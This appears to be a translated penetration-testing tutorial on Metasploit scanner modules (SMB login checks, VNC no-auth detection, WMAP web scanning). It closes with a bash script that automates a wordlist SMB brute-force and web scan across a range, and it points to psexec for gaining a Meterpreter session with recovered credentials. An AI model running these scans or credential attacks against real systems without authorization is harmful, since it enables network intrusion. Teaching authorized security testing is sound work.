We are starting a series of tutorial articles on using vulnerability scanners together with Metasploit.
Required software: Kali Linux.
Required knowledge: experience with the Linux console (in particular, the Kali Linux distribution) and with the Metasploit console.
Most attacks exploit software vulnerabilities or configuration errors. The recommended measures for maintaining an organization's information security are therefore regular vulnerability scans of its systems and penetration testing.
Vulnerability scans check a specified range of IP addresses for possible security problems and give pentesters information about likely attack vectors. When working with vulnerability scanners, remember that they can be wrong: they produce both false positives and false negatives, so every finding should be verified before it is acted on.
As you know, Metasploit Framework is a tool for creating, testing and using exploits. But thanks to its auxiliary modules and plugins, it is also well suited to searching for vulnerabilities.
In this first part we look at the modules built into Metasploit that identify some of the most common security weaknesses.
SMB Login Check
The SMB Login Check module connects over SMB to each host in a specified range of IP addresses and checks whether a given username/password combination is accepted.
Load the module
use auxiliary/scanner/smb/smb_login

set the required options (RHOSTS for the address range; SMBUser and SMBPass for a single credential pair, or USER_FILE and PASS_FILE for wordlists; SMBDomain and THREADS as needed) and run the module

Bear in mind that such a scan will not go unnoticed: every failed authentication attempt creates a failed-logon entry in the Windows Security event log on the target, so a wordlist run against a whole range is very visible to defenders. Credentials confirmed by the scan can then be used in the
exploit/windows/smb/psexec module to obtain a Meterpreter session.
VNC authentication
The VNC scanner looks for VNC servers that accept connections without a password (the "None" security type). Some system administrators ignore information security requirements and do not set a password for establishing a connection, and this is detected during the scan. To use the VNC scanner, first select the auxiliary/scanner/vnc/vnc_none_auth module

set the options (RHOSTS for the address range, RPORT if the server is not on the default port 5900, THREADS) and then run it

At the end of the scan, the result will be displayed with a list of vulnerable VNC servers.
WMAP Web Scanner
WMAP is a feature-rich web application vulnerability scanner which, according to its documentation, was originally created from a tool named SQLMap. Because it runs as a Metasploit plugin, we can scan web applications directly from the framework. Note that WMAP relies on the Metasploit database, so check db_status before starting.
To begin with, we use the built-in Metasploit Web Crawler module, a crawler that maps the structure of the site and stores the results in the database, where wmap picks them up.
use auxiliary/scanner/http/crawler

specify the address of the site in RHOSTS; the start page (URI) can be left at its default of /. Now the module is ready to run.

Next, load the wmap plugin
load wmap

At this stage we already have information about the structure of the site stored in our database. You can view it with the wmap_sites -s [id] command, where id is the number of the site in the wmap_sites -l list
wmap_sites -s 0

Now we define the target
wmap_targets -t 192.168.42.129
The -t option takes the target as a URL, so you can point it at the whole host or at a URL leading to a specific section of the site; wmap_targets -d [id] adds a site by its number from the wmap_sites -l list instead.

Automatic vulnerability scan is started with the wmap_run command.

Look at the list of modules enabled for scanning our target.
wmap_run -t

You can run only the modules whose names match a regular expression, for example wmap_run -m robots_txt, or run all the listed modules at once (which we will do)
wmap_run -e

After the scan is completed, information about the detected issues is stored in the WMAP database. Let's see what wmap found
wmap_vulns -l
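As an added example (not part of the original article), here is the whole procedure from this part collected into one Metasploit resource script, written out by a short shell wrapper and executed with msfconsole -q -r: the SMB Login Check, the VNC scanner, the crawler and the WMAP scan run in sequence without typing each command by hand. The address range 192.168.42.0/24, the web host 192.168.42.129 (the article's example target) and the wordlist paths under /usr/share/metasploit-framework/data/wordlists are assumptions for illustration; replace them with your own.

```shell
#!/usr/bin/env bash
# Added example, not code from the original article: drives the scans
# described above non-interactively from one Metasploit resource script.
# The range, web host and wordlist paths below are illustrative assumptions.
set -eu

# write_scan_rc RANGE WEBHOST USERFILE PASSFILE OUTFILE
# Writes a resource script whose lines are exactly what you would type
# into msfconsole, in the order the article walks through them.
write_scan_rc() {
    local range="$1" webhost="$2" userfile="$3" passfile="$4" out="$5"
    cat > "$out" <<EOF
# wmap stores crawl results in the database, so confirm it is connected first.
db_status

# SMB Login Check: try every user/password pair from the lists against the range.
# Each failed attempt is logged on the target, so keep THREADS modest on a real engagement.
use auxiliary/scanner/smb/smb_login
set RHOSTS $range
set USER_FILE $userfile
set PASS_FILE $passfile
set THREADS 8
set VERBOSE false
run

# VNC servers that accept the "None" security type (no password).
use auxiliary/scanner/vnc/vnc_none_auth
set RHOSTS $range
set RPORT 5900
set THREADS 8
run

# Crawl the site so its structure is in the database, then hand it to wmap.
use auxiliary/scanner/http/crawler
set RHOSTS $webhost
set RPORT 80
set URI /
run

load wmap
wmap_sites -l
wmap_targets -t http://$webhost/
wmap_run -t
wmap_run -e
wmap_vulns -l

# Credentials found by smb_login are kept in the database for exploit/windows/smb/psexec.
creds
exit
EOF
}

# Generate the script and run it if msfconsole is installed (Kali has it);
# otherwise leave the file in place so it can be inspected or run later.
main() {
    local rc
    rc="$(mktemp)"
    write_scan_rc "${1:-192.168.42.0/24}" "${2:-192.168.42.129}" \
        "${3:-/usr/share/metasploit-framework/data/wordlists/unix_users.txt}" \
        "${4:-/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt}" "$rc"
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rc"
    else
        echo "msfconsole not found; resource script written to $rc" >&2
    fi
}

main "$@"
```

Run it on Kali as bash msf_scan.sh 192.168.42.0/24 192.168.42.129 [userlist] [passlist]; the generated file can also be executed inside an already open msfconsole session with the resource command.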

To be continued….
References:
Metasploit Unleashed. Vulnerability Scanning
Metasploit Unleashed. Scanner VNC Auxiliary Modules
Rapid7. VNC Authentication None Detection
Rapid7. CVE-1999-0506 SMB Login Check Scanner
Metasploit Web Crawler
Metasploit Redmine Interface. Metasploit Framework. WMAP